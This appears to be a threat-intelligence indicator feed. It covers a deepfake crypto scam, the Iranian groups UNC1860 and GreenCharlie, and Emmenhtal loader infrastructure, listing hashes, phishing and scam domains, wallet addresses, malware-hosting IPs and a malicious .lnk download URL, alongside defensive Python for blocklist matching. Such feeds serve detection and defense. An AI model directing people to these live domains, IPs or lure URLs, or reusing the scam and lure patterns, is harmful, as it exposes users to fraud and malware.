5b2178c7a0fd69ab00cef041f446e04098bbb397946eda3f6755f9d94d53c221 |
FileHash-SHA256 |
5b6c3d277711d9f847be59b16fd08390fc07d3b27c7c6804e2170f456e9f1173 |
FileHash-SHA256 |
5d2204f3a20e163120f52a2e3595db19890050b2faa96c6cba6b094b0a52b0aa |
FileHash-SHA256 |
62e63388953bb30669b403867a3ac2c8130332cf78133f7fd4a7f23cdc939087 |
FileHash-SHA256 |
69192821f8ce4561cf9c9cb494a133584179116cb2e7409bea3e18901a1ca944 |
FileHash-SHA256 |
699aaea1598a034cde7ed88cd8a8a36fd59447e09bddef566357061774c48a76 |
FileHash-SHA256 |
723d1cf3d74fb3ce95a77ed9dff257a78c8af8e67a82963230dd073781074224 |
FileHash-SHA256 |
7883f01096db9bcf090c2317749b6873036c27ba92451b212b8645770e1f0b8a |
FileHash-SHA256 |
7ad4324ea241782ea859af12094f89f9a182236542627e95b6416c8fb9757c59 |
FileHash-SHA256 |
86a4dd6be867846b251460d2a0874e6413589878d27f2c4482b54cec134cc737 |
FileHash-SHA256 |
882019d1024778e13841db975d5e60aaae1482fcf86ba669e819a68ce980d7d3 |
FileHash-SHA256 |
88c8b472108e0d79d16a1634499c1b45048a10a38ee799054414613cc9dccccc |
FileHash-SHA256 |
90ba27750a04d1308115fa6a90f36503398a8f528c974c5adc07ae8a6cd630e7 |
FileHash-SHA256 |
96339a7e87ffce6ced247feb9b4cb7c05b83ca315976a9522155bad726b8e5be |
FileHash-SHA256 |
9a55f55886285eef7ffabdd55c0232d1458175b1d868c03d3e304ce7d98980bc |
FileHash-SHA256 |
9f188b2f4aa6a5ff3a6fb9048a20c5566f25bd9fb313ed1ba1d332fadd82690f |
FileHash-SHA256 |
9f948af3a30f125dcd24d8a628b3a18c66b3d72baede8496ee735cbdfd9cf0c7 |
FileHash-SHA256 |
a199c9d91a1e7c7051ec40f0a3a51143aa9f06af47a2a5f0e2dd235d7e1fe386 |
FileHash-SHA256 |
a54fef5fe2af58f5bd75c3af44f1fba22b721f34406c5963b19c5376ab278cd1 |
FileHash-SHA256 |
a7b36482ba5bca7a143a795074c432ed627d6afa5bc64de97fa660faa852f1a6 |
FileHash-SHA256 |
ab1a3f8a0510ffa3c043bc200fe357c9ce220ea916f50b8b5b454027ef935c54 |
FileHash-SHA256 |
ab913b3bb637447f33add3c7020d353389738e4d532b905caed04c7c7f399277 |
FileHash-SHA256 |
acb60f0dd19a9a26aaaefd3326db8c28f546b6b0182ed2dcc23170bcb0af6d8f |
FileHash-SHA256 |
ae7c868713e1d02b4db60128c651eb1e3f6a33c02544cc4cb57c3aa6c6581b6e |
FileHash-SHA256 |
affcb453760dbc48b39f8d4defbcc4fc65d00df6fae395ee27f031c1833abada |
FileHash-SHA256 |
b18b40f513bae376905e259d325c12f9d700ee95f0d908a4d977a80c0420d52e |
FileHash-SHA256 |
b32daf27aa392d26bdf5faafbaae6b21cd6c918d461ff59f548a73d447a96dd9 |
FileHash-SHA256 |
cce74c82a718be7484abf7c51011793f2717cfb2068c92aa35416a93cbd13cfa |
FileHash-SHA256 |
d15bfbc181aac8ce9faa05c2063ef4695c09b718596f43edc81ca02ef03110d1 |
FileHash-SHA256 |
d1949c75e7cb8e57f52e714728817ce323f6980c8c09e161c9e54a1e72777c13 |
FileHash-SHA256 |
d73f6e240766ddd6c3c16eff8db50794ab8ab95c6a616d4ab2bc96780f13464d |
FileHash-SHA256 |
d8e9e06b7adea939bcc135876f4e8a1d3719120e8ad9d4d72812ffd1dbee62fc |
FileHash-SHA256 |
d943a4aabd76582218fd1a9a0a77b2f6a6715b198f9994f0feae6f249b40fdf9 |
FileHash-SHA256 |
dc56a30c0082145ad5639de443732e55dd895a5f0254644d1b1ec1b9457f04ff |
FileHash-SHA256 |
dd32c037ed9b72acb6eda4f5193c7f1adc1e7e8d2aefcdd4b16de2f48420e1d3 |
FileHash-SHA256 |
df5b004be71717362e6b1ad22072f9ee4113b95b5d78c496a90857977a9fb415 |
FileHash-SHA256 |
df9498892ae72f611128c9a8bc57b93964f34cc235f5aaf57fe10fb2b3c69aa3 |
FileHash-SHA256 |
e28188e516db1bda9015c30de59a2e91996b67c2e2b44989a6b0f562577fd757 |
FileHash-SHA256 |
f039eaaced72618eaba699d2985f9e10d252ac5fe85d609c217b45bc8c3614f4 |
FileHash-SHA256 |
f14c7eacdb39f1decdcf1e68f57c87340968fede1dc0391b2b082f58bd3a3f93 |
FileHash-SHA256 |
fafaff3d665b26b5c057e64b4238980589deb0dff0501497ac50be1bc91b3e08 |
FileHash-SHA256 |
fff35c2da67eef6f1a10c585b427ac32e7f06f4e4460542207abcd62264e435f |
domain |
kekeoamigo.com |
|
Deep Fake Crypto Scams |
Cybercriminals used the U.S. presidential debate as the lure for a cryptocurrency scam built on deepfake video. Hijacked YouTube channels carried fake streams purporting to show Elon Musk and Donald Trump debating Kamala Harris, and the videos urged viewers to invest in cryptocurrency while the event was running. The campaign relied on well-established YouTube accounts, QR codes pointing to deceptive domains, and AI-generated content, and it traded on a current event to push the streams up in search rankings; several researchers reported on it. The operators used 'stream-jacking': they took over victim channels, rebranded them as Tesla-related, and posted pre-recorded 'livestreams' with inflated view counts. The scam sites used anti-bot measures and pushed victims to connect their cryptocurrency wallets; some of the scam's wallets accumulated significant funds. |
Type |
Indicator |
BitcoinAddress |
bc1qfwjgvwesz5k2dpjpvwueze2v009wjh76hn9gfn |
BitcoinAddress |
bc1qjanjaawj4g0n5xlm03dmpx97u5yrpzljuhuxz8 |
domain |
ark-fund.pro |
domain |
chaindrop.promo |
domain |
crypto-participate.com |
domain |
debate.gift |
domain |
doubleetherx2.com |
domain |
eth-up.gift |
domain |
eth23.io |
domain |
ether2022.info |
domain |
eththemerge.net |
domain |
give-toncoin.com |
domain |
harryteams.com |
domain |
promo-tesla.io |
domain |
takeeth.net |
domain |
tesladebate.com |
domain |
teslatrump.org |
domain |
trump-debate.com |
domain |
trump-elon.gives |
domain |
trumptesla.org |
domain |
usmusk.net |
domain |
x2-event.pro |
domain |
x2coinbase.org |
hostname |
eththemerge.survay.pro |
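
Because the list mixes registrable domains with one hostname on a third-party zone, a blocklist check has to match on label boundaries rather than by substring. The following is an added example, not code from the report or from the researchers who covered the scam: it copies the domain and hostname indicators above and checks observed FQDNs against them so that subdomains of a listed name match, case and trailing dots are ignored, and a look-alike such as notdebate.gift does not. The observed hostnames in the sample are constructed.

```python
"""Match observed FQDNs against the Deep Fake Crypto Scams domain indicators.

Added example; the indicator values are copied from the list above, and the
observed hostnames in the sample below are constructed test input.
"""
from typing import Optional

# Domain and hostname indicators from the list above.  Every entry is treated
# as a zone: the name itself and any name beneath it is a hit.
INDICATORS = {
    "ark-fund.pro", "chaindrop.promo", "crypto-participate.com", "debate.gift",
    "doubleetherx2.com", "eth-up.gift", "eth23.io", "ether2022.info",
    "eththemerge.net", "give-toncoin.com", "harryteams.com", "promo-tesla.io",
    "takeeth.net", "tesladebate.com", "teslatrump.org", "trump-debate.com",
    "trump-elon.gives", "trumptesla.org", "usmusk.net", "x2-event.pro",
    "x2coinbase.org",
    "eththemerge.survay.pro",  # listed as a hostname on a third-party zone
}


def _labels(name: str) -> list:
    """Normalise a DNS name: lower-case, drop a trailing dot and empty labels."""
    return [l for l in name.lower().rstrip(".").split(".") if l]


def matches_zone(fqdn: str, zone: str) -> bool:
    """True if fqdn equals zone or lies beneath it, comparing whole labels.

    'www.debate.gift' matches 'debate.gift'; 'notdebate.gift' does not,
    because the comparison is on labels, not on a string suffix.
    """
    f, z = _labels(fqdn), _labels(zone)
    return len(f) >= len(z) and f[-len(z):] == z


def classify(fqdn: str) -> Optional[str]:
    """Return the most specific matching indicator, or None."""
    for zone in sorted(INDICATORS, key=lambda z: len(_labels(z)), reverse=True):
        if matches_zone(fqdn, zone):
            return zone
    return None


def scan(observed) -> dict:
    """Map every observed FQDN that hits an indicator to the indicator hit."""
    hits = {}
    for fqdn in observed:
        zone = classify(fqdn)
        if zone is not None:
            hits[fqdn] = zone
    return hits


if __name__ == "__main__":
    # Constructed sample, as a DNS or proxy log might record the names.
    sample = [
        "www.debate.gift.",              # subdomain of a listed domain, trailing dot
        "TeslaDebate.com",               # case differs from the indicator
        "notdebate.gift",                # different registrable domain: no hit
        "login.eththemerge.survay.pro",  # beneath the listed hostname
        "survay.pro",                    # parent of the listed hostname: no hit
        "example.com",
    ]
    for host, zone in scan(sample).items():
        print(f"{host:32} -> {zone}")
```

The parent zone of the listed hostname (survay.pro) is deliberately not matched, since nothing on the page says the zone itself is attacker-controlled.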
|
UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks |
UNC1860 is an Iranian state-sponsored threat actor likely affiliated with Iran's Ministry of Intelligence and Security (MOIS). It uses specialised tooling and passive backdoors to gain initial access and to keep persistent access to networks, targeting government and telecommunications organisations in the Middle East in particular. The group acts as an initial access provider for other actors, operates its malware through GUI-based controllers, and maintains a diverse collection of passive implants. Passive implants wait for inbound connections instead of beaconing out, so detections that rely on outbound command-and-control traffic will not see them. Its arsenal also includes defence-evasion utilities, kernel-level drivers, and custom implementations of encryption schemes. The depth of its Windows internals knowledge and reverse-engineering skill makes it a formidable threat, able to support objectives ranging from espionage to network attacks. |
Type |
Indicator |
CVE |
CVE-2019-0604 |
FileHash-MD5 |
07db3058e32fe5f36823dc7092cd7d5b |
FileHash-MD5 |
0c93cac9854831da5f761ee98bb40c37 |
FileHash-MD5 |
0c9ff0db00f04fd4c6a9160bffd85a1d |
FileHash-MD5 |
1176381da7dea356f3377a59a6f0e799 |
FileHash-MD5 |
126bc1c30fba27f8bf67dce4892b1e8c |
FileHash-MD5 |
14e54ff4805840e656efb8cd38de4751 |
FileHash-MD5 |
17b27e6aa0ab6501f11bb4d2e0f829ff |
FileHash-MD5 |
1e6679cd25d1bb127a0bec665adcf21e |
FileHash-MD5 |
1e896f026246872b2feb4f8e3e093815 |
FileHash-MD5 |
2398a83f10329a107801d3d23d06f7cb |
FileHash-MD5 |
286bd9c2670215d3cb4790aac4552f22 |
FileHash-MD5 |
2cece71e107d12ffd74b2fb24bf339a6 |
FileHash-MD5 |
2e803d28809be2a0216f25126efde37b |
FileHash-MD5 |
31f2369d2e38c78f5b3f2035dba07c08 |
FileHash-MD5 |
3d5d05f230ae702c04098de512d93d48 |
FileHash-MD5 |
3dd829fb27353622eff34be1eabb8f18 |
FileHash-MD5 |
4029bc4a06638bb9ac4b8528523b72f6 |
FileHash-MD5 |
41f4732ed369f2224a422752860b0bc5 |
FileHash-MD5 |
46804472541ed61cc904cd14be18fe1d |
FileHash-MD5 |
490590bfdeeedf44b3ae306409bb0d03 |
FileHash-MD5 |
4abcf21b63781a53bbc1aa17bd8d2cbc |
FileHash-MD5 |
4b2c78bb2c439998cff0cc097a14b942 |
FileHash-MD5 |
4dd6250eb2d368f500949952eb013964 |
FileHash-MD5 |
4de802f7e61cb8c820a02e042b58b215 |
FileHash-MD5 |
57c916da83cc634af22bde0ad44d0db3 |
FileHash-MD5 |
57cd8e220465aa8030755d4009d0117c |
FileHash-MD5 |
6626dbe74acd15d06ff6900071ef240c |
FileHash-MD5 |
69fd67c115349abb4a313230a1692642 |
FileHash-MD5 |
6d3041b89484c273376e5189e190d235 |
FileHash-MD5 |
73fb0fe5cd96a14a4f85639223aec6a8 |
FileHash-MD5 |
7b2fa099d51fa3885766f6d60d768748 |
FileHash-MD5 |
7f5f5f290910d256e6b012f898c88bf3 |
FileHash-MD5 |
85427a8a47c4162b48d8dfb37440665d |
FileHash-MD5 |
8d070a93a45ed8ba6dba6bfbe0d084e7 |
FileHash-MD5 |
929b12bc9f9e5f8e854de1d46ebf40d9 |
FileHash-MD5 |
952482949f495fb66e493e441229ae4b |
FileHash-MD5 |
a038975255d3dda636d86ccd307f7838 |
FileHash-MD5 |
a3ea0d13848a104c28d035a9d518acc2 |
FileHash-MD5 |
a500561c0b374816972094c2aa90da2a |
FileHash-MD5 |
a65ee1a82975ee4c8d4e70219e1bfff5 |
FileHash-MD5 |
a7693e399602eb79db537c5022dd1e01 |
FileHash-MD5 |
a90236e4962620949b720f647a91f101 |
FileHash-MD5 |
a991bdbf1e36d7818d7a340a35a4ea26 |
FileHash-MD5 |
b219672bcd60ce9a81b900217b3b5864 |
FileHash-MD5 |
b26d54b7da7b2bf600104f69da4ea00f |
FileHash-MD5 |
b34883fb1630db43e06a38cebfa0bce2 |
FileHash-MD5 |
b4b1e285b9f666ae7304a456da01545e |
FileHash-MD5 |
bd6464f12bb6f7f02b6ffebb363d8e5f |
FileHash-MD5 |
c11a4e4a2d484513f79bd127a0387b0c |
FileHash-MD5 |
c21eefc65cda49f17ddd1d243a7bffb5 |
FileHash-MD5 |
c50ae2c4b76f0d5724ec240568c78c4f |
FileHash-MD5 |
c517519097bff386dc1784d98ad93f9d |
FileHash-MD5 |
c57e59314aee7422e626520e495effe0 |
FileHash-MD5 |
c8fa0ce3ae6a13af640607ea606c55f9 |
FileHash-MD5 |
c90ec587e3333dabb647ebc182673460 |
FileHash-MD5 |
ca3f0d25f7da0e8cde8e1f367451c77a |
FileHash-MD5 |
caffdb648a0a68cd36694f0f0c7699d7 |
FileHash-MD5 |
ce537dd649a391e52c27a3f88a0a8912 |
FileHash-MD5 |
d1ce3117060e85247145c82005dda985 |
FileHash-MD5 |
d1e45afbfd3424612b4a4218cc7357ef |
FileHash-MD5 |
d87ca3f830b8b53fde358bb64900f6af |
FileHash-MD5 |
d9719f6738dbfaa21be7f184512fe074 |
FileHash-MD5 |
da0085a97c38ead734885e5cced1847f |
FileHash-MD5 |
e67687b4443f58d2b0a465e3af3caffe |
FileHash-MD5 |
e86e885e6c96ac72482741d8696c17fb |
FileHash-MD5 |
efe8043e1b4214640c5f7b5ddf737653 |
FileHash-MD5 |
f0dfb7bf01c0412891da8fa2702f4c7b |
FileHash-MD5 |
f292e61774c267c3787fdfcace50ea7b |
FileHash-MD5 |
f89be788e4adf665acf1a8ef8fcaa133 |
FileHash-MD5 |
fa1c6f7a5e02374b9d33de2578cb3399 |
FileHash-MD5 |
fc90907e70f18c7f6a6b9d9599b6f97c |
FileHash-MD5 |
ff6f16b00c9f36b32cd60fecd4dfc8e9 |
FileHash-SHA1 |
22c9da04847c26188226c3a345e2126ef00aa19e |
FileHash-SHA1 |
2df9c309e08140e9e9af624a6c40355819a91720 |
FileHash-SHA1 |
32a1651bb810bbe58df73bc2d2c2fa702ca7abd0 |
FileHash-SHA1 |
398ee9da244c53a136efee5e1d8acd1298008497 |
FileHash-SHA1 |
39cc32a3ede0d01cd89c7b5424beda618f805982 |
FileHash-SHA1 |
3f2fd2dfd27bf3cafcbf0946e308832e11a1d9c1 |
FileHash-SHA1 |
4c34d1cd875e39a8fa854eff3b520cdc68275f9d |
FileHash-SHA1 |
6802e2d2d4e6ee38aa513dafd6840e864310513b |
FileHash-SHA1 |
6cafd44c86fff605b4c25582955b725b96c1d911 |
FileHash-SHA1 |
6ec0c1d6311656c76787297775a8d0cb0aa6c4c7 |
FileHash-SHA1 |
70bc7b43e119060dce54568a1beb140da565a482 |
FileHash-SHA1 |
7820e56fbcde06ff766239e58c53610151962def |
FileHash-SHA1 |
7f7d144cc80129d0db3159ea5d4294c34b79b20a |
FileHash-SHA1 |
9c58ec8f7ce75ba1b629c9ef84ab069a32313288 |
FileHash-SHA1 |
a4044e90be800adab547a238f8639db3cf92ebdc |
FileHash-SHA1 |
b8421c8e54fa5dabcfd38df68b3ac93b449d8d2d |
FileHash-SHA1 |
b871e9afd7da87ee818ed7349a1579f3b31e104f |
FileHash-SHA1 |
c0afb5797e6873bbee69f9bf0aa7a9dd3a1c6fff |
FileHash-SHA1 |
c1fbe0fc31099b71315355da25a7036ea51a8627 |
FileHash-SHA1 |
dba1dce5bfe4e0290bd378a0126492569bdabc39 |
FileHash-SHA1 |
e287f70804460043b12410f95b4fa400e1910f42 |
FileHash-SHA1 |
eb60ffb03e1da380563e796b867fbddeb1fac77d |
FileHash-SHA1 |
ec238353f020243758eb7511dddf8ab6ba01b35d |
FileHash-SHA256 |
1146b1f38e420936b7c5f6b22212f3aa93515f3738c861f499ed1047865549cb |
FileHash-SHA256 |
1485c0ed3e875cbdfc6786a5bd26d18ea9d31727deb8df290a1c00c780419a4e |
FileHash-SHA256 |
2097320e71990865f04b9484858d279875cf5c66a5f6d12c819a34e2385da838 |
FileHash-SHA256 |
269d7faed3a01b5ff9181df32e3fdbf7f7f193cc53e4f28aa21290343e69f3cd |
FileHash-SHA256 |
36b61f94bdfc86e736a4ee30718e0b1ee1c07279db079d48d3fe78b1578dbf03 |
FileHash-SHA256 |
3875ed58c0d42e05c83843b32ed33d6ba5e94e18ffe8fb1bf34fd7dedf3f82a7 |
FileHash-SHA256 |
596b2a90c1590eaf704295a2d95aae5d2fec136e9613e059fd37de4b02fd03bb |
FileHash-SHA256 |
6f0a38c9eb9171cd323b0f599b74ee571620bc3f34aa07435e7c5822663de605 |
FileHash-SHA256 |
7495c1ea421063845eb8f4599a1c17c105f700ca0671ca874c5aa5aef3764c1c |
FileHash-SHA256 |
8578bff36e3b02cc71495b647db88c67c3c5ca710b5a2bd539148550595d0330 |
FileHash-SHA256 |
9117bd328e37be121fb497596a2d0619a0eaca44752a1854523b8af46a5b0ceb |
FileHash-SHA256 |
a052413e65e025cbefdddff6eeae91161de17ffec16d3a741dd9b7c33d392435 |
FileHash-SHA256 |
a2598161e1efff623de6128ad8aafba9da0300b6f86e8c951e616bd19f0a572b |
FileHash-SHA256 |
c0dc609e6fc8801bb902d14910c3ffd69d6bd5a26389836446dc4c23565ddcc7 |
FileHash-SHA256 |
c3fa9432243e1a2ab1991ab4c07a19392038e6a8e817e5fea0232c4caabbb950 |
FileHash-SHA256 |
c5b4542d61af74cf7454d7f1c8d96218d709de38f94ccfa7c16b15f726dc08c0 |
FileHash-SHA256 |
da450c639c9a50377233c0f195c3f6162beb253f320ed57d5c9bb9c7f0e83999 |
FileHash-SHA256 |
e1ad173e49eee1194f2a55afa681cef7c3b8f6c26572f474dec7a42e9f0cdc9d |
FileHash-SHA256 |
f4639c63fb01875946a4272c3515f005d558823311d0ee4c34896c2b66122596 |
FileHash-SHA256 |
f6c316e2385f2694d47e936b0ac4bc9b55e279d530dd5e805f0d963cb47c3c0d |
FileHash-SHA256 |
fa2c5fa2814d4db288bf8733edc4f1a78cd2c72cde90f42cf5b14162ac648042 |
FileHash-SHA256 |
fe14edf4db2a9838f15aaf24a5837ffc5c901313d6fd2fe60d15401154e44406 |
|
GreenCharlie Infrastructure Linked to US Political Campaign Targeting |
Insikt Group's analysis found a marked increase in activity from GreenCharlie, an Iran-linked group associated with Mint Sandstorm, Charming Kitten, and APT42. The group persistently targets US political and governmental entities with phishing operations that deliver malware such as GORBLE and POWERSTAR. Its infrastructure leans on dynamic DNS providers and on deceptive domain themes (document, cloud and editor lures, as the hostnames below show) to make phishing links look plausible. Recorded Future's Network Intelligence also observed Iran-based IP addresses communicating with GreenCharlie infrastructure, further supporting Iranian involvement. |
Type |
Indicator |
FileHash-SHA256 |
33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 |
FileHash-SHA256 |
4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f |
FileHash-SHA256 |
c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 |
domain |
activeeditor.info |
domain |
chatsynctransfer.info |
domain |
cloudarchive.info |
domain |
cloudregionpages.info |
domain |
directfileinternal.info |
domain |
itemselectionmode.info |
domain |
messagepending.info |
domain |
onetimestorage.info |
domain |
onlinecloudzone.info |
domain |
personalcloudparent.info |
domain |
personalwebview.info |
domain |
pkglessplans.xyz |
domain |
projectdrivevirtualcloud.co.uk |
domain |
realcloud.info |
domain |
researchdocument.info |
domain |
selfpackage.info |
domain |
webviewerpage.info |
hostname |
admin.cheap-case.site |
hostname |
api.cheap-case.site |
hostname |
api.overall-continuing.site |
hostname |
app.cheap-case.site |
hostname |
backend.cheap-case.site |
hostname |
callfeedback.duia.ro |
hostname |
cloudtools.duia.eu |
hostname |
coldwarehexahash.dns-dynamic.net |
hostname |
contentpreview.redirectme.net |
hostname |
continue.duia.eu |
hostname |
continueresource.forumz.info |
hostname |
demo.cheap-case.site |
hostname |
destinationzone.duia.eu |
hostname |
dev.cheap-case.site |
hostname |
doceditor.duckdns.org |
hostname |
documentcloudeditor.ddnsgeek.com |
hostname |
dynamicrender.line.pm |
hostname |
dynamictranslator.ddnsgeek.com |
hostname |
editioncloudfiles.dns-dynamic.net |
hostname |
entryconfirmation.duckdns.org |
hostname |
filereader.dns-dynamic.net |
hostname |
finaledition.redirectme.net |
hostname |
highlightsreview.line.pm |
hostname |
hugmefirstddd.ddns.net |
hostname |
icenotebook.ddns.net |
hostname |
joincloud.duckdns.org |
hostname |
joincloud.mypi.co |
hostname |
lineeditor.001www.com |
hostname |
lineeditor.32-b.it |
hostname |
lineeditor.mypi.co |
hostname |
linereview.duia.eu |
hostname |
longlivefreedom.ddns.net |
hostname |
mobiletoolssdk.dns-dynamic.net |
hostname |
nextcloud.duia.us |
hostname |
nextcloudzone.dns-dynamic.net |
hostname |
overflow.duia.eu |
hostname |
preparingdestination.fixip.org |
hostname |
readquickarticle.dns-dynamic.net |
hostname |
realpage.redirectme.net |
hostname |
reviewedition.duia.eu |
hostname |
searchstatistics.duckdns.org |
hostname |
sharestoredocs.theworkpc.com |
hostname |
smartview.dns-dynamic.net |
hostname |
softservicetel.ddns.net |
hostname |
sourceusedirection.mypi.co |
hostname |
storageprovider.duia.eu |
hostname |
streaml23.duia.eu |
hostname |
synctimezone.dns-dynamic.net |
hostname |
termsstatement.duckdns.org |
hostname |
thisismyapp.accesscam.org |
hostname |
thisismydomain.chickenkiller.com |
hostname |
timelinepage.dns-dynamic.net |
hostname |
timezone-update.duckdns.org |
hostname |
towerreseller.dns-dynamic.net |
hostname |
tracedestination.duia.eu |
hostname |
translatorupdater.dns-dynamic.net |
hostname |
uptime-timezone.dns-dynamic.net |
hostname |
uptimezonemetadta.run.place |
hostname |
vector.kozow.com |
hostname |
viewdestination.vpndns.net |
hostname |
worldstate.duia.us |
hostname |
www.chatsynctransfer.info |
hostname |
www.selfpackage.info |
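
The two patterns the summary names, dynamic DNS zones and themed labels, can be pulled straight out of the listing. The following is an added example, not code from Insikt Group or Recorded Future: it parses the flattened 'Type | Indicator' format used on this page into records, groups the hostname indicators by the zone they hang off, and separates zones on known dynamic DNS services from the group's own registered domains. The embedded listing is a subset copied from above; DYNAMIC_DNS_ZONES is the author's own short list of dynamic DNS zones and is an assumption to extend before real use.

```python
"""Parse the flattened 'Type | Indicator' listing and group GreenCharlie
hostnames by parent zone, to show the dynamic DNS pattern in the data.

Added example; the records embedded below are a subset copied from the list
above, and DYNAMIC_DNS_ZONES is an assumed list of dynamic DNS zones.
"""
from collections import defaultdict

# Constructed input: a subset of the listing above, in the page's own format.
SAMPLE_LISTING = """\
Type |
Indicator |
FileHash-SHA256 |
33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 |
domain |
activeeditor.info |
domain |
selfpackage.info |
hostname |
doceditor.duckdns.org |
hostname |
entryconfirmation.duckdns.org |
hostname |
documentcloudeditor.ddnsgeek.com |
hostname |
filereader.dns-dynamic.net |
hostname |
smartview.dns-dynamic.net |
hostname |
cloudtools.duia.eu |
hostname |
continue.duia.eu |
hostname |
hugmefirstddd.ddns.net |
hostname |
thisismydomain.chickenkiller.com |
hostname |
www.selfpackage.info |
"""

# Assumed set of dynamic DNS zones (Duck DNS, No-IP, Dynu, FreeDNS and
# similar); extend it from your own intelligence before relying on it.
DYNAMIC_DNS_ZONES = {
    "duckdns.org", "ddns.net", "redirectme.net", "dns-dynamic.net",
    "ddnsgeek.com", "duia.eu", "duia.ro", "duia.us", "mypi.co", "kozow.com",
    "chickenkiller.com", "theworkpc.com", "accesscam.org", "vpndns.net",
}


def parse_indicators(text: str) -> list:
    """Turn the two-lines-per-record listing into (type, value) tuples."""
    cells = [ln.strip().rstrip("|").strip() for ln in text.splitlines()]
    cells = [c for c in cells if c]              # drop blank rows and lone '|'
    if cells[:2] == ["Type", "Indicator"]:       # header row
        cells = cells[2:]
    if len(cells) % 2:
        raise ValueError("odd number of cells: the listing is truncated")
    return list(zip(cells[0::2], cells[1::2]))


def parent_zone(host: str, depth: int = 2) -> str:
    """Last `depth` labels of a host.  Two labels is a fair approximation for
    the zones seen here; use a public-suffix list for names like *.co.uk."""
    return ".".join(host.lower().rstrip(".").split(".")[-depth:])


def group_hostnames(indicators) -> dict:
    """Group 'hostname' indicators by parent zone, keeping listing order."""
    groups = defaultdict(list)
    for kind, value in indicators:
        if kind == "hostname":
            groups[parent_zone(value)].append(value)
    return dict(groups)


def dynamic_dns_hostnames(indicators) -> dict:
    """Only the groups whose zone is a known dynamic DNS service."""
    return {z: hs for z, hs in group_hostnames(indicators).items()
            if z in DYNAMIC_DNS_ZONES}


def lure_themes(indicators) -> list:
    """The leftmost label of each dynamic DNS hostname, i.e. the label the
    operator chose; most of them read as document, cloud or editor services."""
    return sorted(h.split(".")[0]
                  for hs in dynamic_dns_hostnames(indicators).values()
                  for h in hs)


if __name__ == "__main__":
    recs = parse_indicators(SAMPLE_LISTING)
    for zone, hosts in group_hostnames(recs).items():
        tag = "dynamic DNS" if zone in DYNAMIC_DNS_ZONES else "actor-registered"
        print(f"{zone:20} {tag:16} {len(hosts)} host(s)")
    print("themes:", ", ".join(lure_themes(recs)))
```

Feeding the full listing above through parse_indicators instead of the embedded subset works the same way; the parser only needs the 'Type |' / 'Indicator |' header and the alternating type/value rows.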
|
WebDAV-as-a-Service: Uncovering the infrastructure behind Emmenhtal loader distribution - Sekoia.io Blog |
The Emmenhtal loader, also tracked as PeakLight, runs in memory only, which makes it hard to detect and analyse. It is used mainly to deliver other malicious payloads, including well-known infostealers that harvest sensitive information. The indicators below are the IP addresses of the WebDAV distribution infrastructure and the LNK lure URLs served from it: the shortcuts sit under a /Downloads/ path on bare IP addresses (one on port 81), and many carry a double extension such as Invoice.pdf.lnk so that the shortcut passes for a document. |
Type |
Indicator |
IPv4 |
104.131.7.207 |
IPv4 |
141.98.234.166 |
IPv4 |
147.45.178.54 |
IPv4 |
147.45.50.142 |
IPv4 |
147.45.50.144 |
IPv4 |
147.45.50.172 |
IPv4 |
147.45.50.214 |
IPv4 |
147.45.50.23 |
IPv4 |
147.45.50.26 |
IPv4 |
147.45.50.34 |
IPv4 |
147.45.50.57 |
IPv4 |
147.45.50.86 |
IPv4 |
147.45.79.82 |
IPv4 |
151.236.17.180 |
IPv4 |
168.100.9.199 |
IPv4 |
178.209.51.222 |
IPv4 |
185.143.223.188 |
IPv4 |
185.196.8.158 |
IPv4 |
191.243.196.114 |
IPv4 |
193.124.33.71 |
IPv4 |
193.233.75.13 |
IPv4 |
194.190.152.108 |
IPv4 |
194.87.252.22 |
IPv4 |
200.150.194.109 |
IPv4 |
206.188.196.28 |
IPv4 |
212.18.104.111 |
IPv4 |
45.151.62.238 |
IPv4 |
46.29.234.129 |
IPv4 |
62.133.61.101 |
IPv4 |
62.133.61.104 |
IPv4 |
62.133.61.106 |
IPv4 |
62.133.61.148 |
IPv4 |
62.133.61.155 |
IPv4 |
62.133.61.168 |
IPv4 |
62.133.61.189 |
IPv4 |
62.133.61.207 |
IPv4 |
62.133.61.240 |
IPv4 |
62.133.61.26 |
IPv4 |
62.133.61.37 |
IPv4 |
62.133.61.43 |
IPv4 |
62.133.61.49 |
IPv4 |
62.133.61.56 |
IPv4 |
62.133.61.69 |
IPv4 |
62.133.61.73 |
IPv4 |
62.133.61.79 |
IPv4 |
62.133.61.90 |
IPv4 |
62.133.61.97 |
IPv4 |
62.133.61.98 |
IPv4 |
78.153.139.202 |
IPv4 |
79.137.203.158 |
IPv4 |
82.115.223.234 |
IPv4 |
84.247.187.231 |
IPv4 |
89.110.78.58 |
IPv4 |
89.23.103.118 |
IPv4 |
89.23.103.123 |
IPv4 |
89.23.103.15 |
IPv4 |
89.23.103.188 |
IPv4 |
89.23.103.205 |
IPv4 |
89.23.103.253 |
IPv4 |
89.23.103.56 |
IPv4 |
89.23.103.57 |
IPv4 |
89.23.103.8 |
IPv4 |
89.23.103.97 |
IPv4 |
89.23.107.113 |
IPv4 |
89.23.107.123 |
IPv4 |
89.23.107.168 |
IPv4 |
89.23.107.181 |
IPv4 |
89.23.107.240 |
IPv4 |
89.23.107.244 |
IPv4 |
89.23.107.251 |
IPv4 |
89.23.107.67 |
IPv4 |
89.23.113.140 |
IPv4 |
91.202.233.136 |
IPv4 |
91.92.240.234 |
IPv4 |
91.92.240.247 |
IPv4 |
91.92.240.29 |
IPv4 |
91.92.243.198 |
IPv4 |
91.92.243.74 |
IPv4 |
91.92.245.185 |
IPv4 |
91.92.245.222 |
IPv4 |
91.92.246.102 |
IPv4 |
91.92.248.129 |
IPv4 |
91.92.248.50 |
IPv4 |
91.92.248.77 |
IPv4 |
91.92.248.90 |
IPv4 |
91.92.250.123 |
IPv4 |
91.92.250.150 |
IPv4 |
91.92.250.44 |
IPv4 |
91.92.251.35 |
IPv4 |
91.92.253.126 |
IPv4 |
91.92.254.167 |
IPv4 |
91.92.254.225 |
IPv4 |
92.118.112.223 |
IPv4 |
92.118.112.253 |
IPv4 |
94.131.112.206 |
IPv4 |
94.156.64.74 |
IPv4 |
94.156.64.76 |
IPv4 |
94.156.65.126 |
IPv4 |
94.156.65.130 |
IPv4 |
94.156.69.111 |
IPv4 |
94.156.69.6 |
IPv4 |
94.156.8.31 |
IPv4 |
95.164.68.24 |
IPv4 |
95.216.196.85 |
URL |
http://147.45.50.214/Downloads/demo.pdf.lnk |
URL |
